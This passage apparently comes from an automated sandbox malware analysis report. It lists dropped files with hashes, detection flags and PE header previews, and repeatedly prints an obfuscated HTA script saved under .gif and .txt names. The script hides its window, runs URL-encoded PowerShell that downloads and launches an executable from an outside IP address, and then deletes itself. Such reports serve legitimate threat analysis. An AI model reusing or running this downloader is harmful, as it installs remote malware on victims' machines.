                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\nss3.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Temp\.gif

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\.gif, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\.hta (copy)

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\8tA3oGhlP.gif (copy)

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\8tA3oGhlP.txt

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\8tA3oGhlP.txt, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\NLqFjPikt.gif (copy)

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\NLqFjPikt.txt

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\NLqFjPikt.txt, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\QZ7iCUD92.gif (copy)

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

                                                                                                                                                                                                                        C:\Temp\QZ7iCUD92.txt

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\QZ7iCUD92.txt, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

